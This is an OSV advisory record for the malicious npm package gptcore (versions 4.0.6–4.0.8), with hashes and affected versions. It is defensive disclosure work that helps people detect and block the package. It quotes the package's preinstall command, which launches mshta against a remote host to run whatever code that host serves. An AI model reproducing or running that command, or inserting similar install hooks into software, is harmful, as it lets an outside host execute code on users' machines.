MAL-2026-10204

See a problem?
Import Source
https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/gptcore/MAL-2026-10204.json
JSON Data
https://api.osv.dev/v1/vulns/MAL-2026-10204
Published
2026-07-12T20:45:48Z
Modified
2026-07-12T21:01:53.488291835Z
Summary
Malicious code in gptcore (npm)
Details

-= Per source details. Do not edit below this line.=-

Source: amazon-inspector (c36c51510f3762d03ab5bd7132de4a65a950f410cb5771a99d4fdc9334a9c895)

gptcore@4.0.7 declares a preinstall lifecycle script that runs exec('cmd /c "mshta http://fixars.top"') in preinstall.js. On Windows, this fires automatically during npm install and launches mshta.exe against the remote URL http://fixars.top, causing whatever HTA/JScript content that host currently serves to execute on the installer's machine. The destination is a hardcoded third-party host over plain HTTP, with no pinning, hash verification, or relationship to a legitimate publisher, and the fetched content is unrelated to any documented package purpose.

Database specific
{
    "malicious-packages-origins": [
        {
            "modified_time": "2026-07-12T20:45:58Z",
            "versions": [
                "4.0.6"
            ],
            "sha256": "5a9090400e6b3b665a6b9c2fbb92d6affedfabc6fcc4352aa83ae05a5a339036",
            "import_time": "2026-07-12T20:48:33.452301603Z",
            "source": "amazon-inspector",
            "id": "IN-MAL-2026-009755"
        },
        {
            "modified_time": "2026-07-12T20:46:05Z",
            "versions": [
                "4.0.7"
            ],
            "sha256": "c36c51510f3762d03ab5bd7132de4a65a950f410cb5771a99d4fdc9334a9c895",
            "id": "IN-MAL-2026-009756",
            "source": "amazon-inspector",
            "import_time": "2026-07-12T20:48:33.504498296Z"
        },
        {
            "modified_time": "2026-07-12T20:45:48Z",
            "versions": [
                "4.0.8"
            ],
            "sha256": "eb1d038afd41c44c18854fdb31cdee216cb85c80e76ad73c43a2f916f0ba4d9c",
            "id": "IN-MAL-2026-009754",
            "source": "amazon-inspector",
            "import_time": "2026-07-12T20:48:33.402823591Z"
        }
    ]
}
References
Credits

Affected packages

npm / gptcore

Package

Affected ranges

Affected versions

4.*
4.0.6
4.0.7
4.0.8

Database specific

indicators
{
    "evidence_files": [
        {
            "tlsh": "70b012d499453234b252a0e02c3060225807c441225055e0648c451d441741516235fd",
            "sha256": "6531737cdf18669d076b7ff3bf8168ddc74828f385a4a037a47bd8767d11b889",
            "path": "preinstall.js"
        }
    ],
    "package_integrity": [
        {
            "hashes": {
                "sha1": "d9ea412a40b039fb06addc66b8166d2fa8f37ec1",
                "sha512_sri": "sha512-p9tIpLBNkia8fBvqeZNknacDz1jZ54YVtDBNQbegpzYzoeaHZDpFnSW0pXiBqOY9Asxlpo9jFmG/V8+uPUl9qA=="
            },
            "filename": "gptcore-4.0.8.tgz"
        }
    ]
}
cwes
[
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    },
    {
        "description": "The product contains code that appears to be malicious in nature.",
        "name": "Embedded Malicious Code",
        "cweId": "CWE-506"
    }
]
source
"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/gptcore/MAL-2026-10204.json"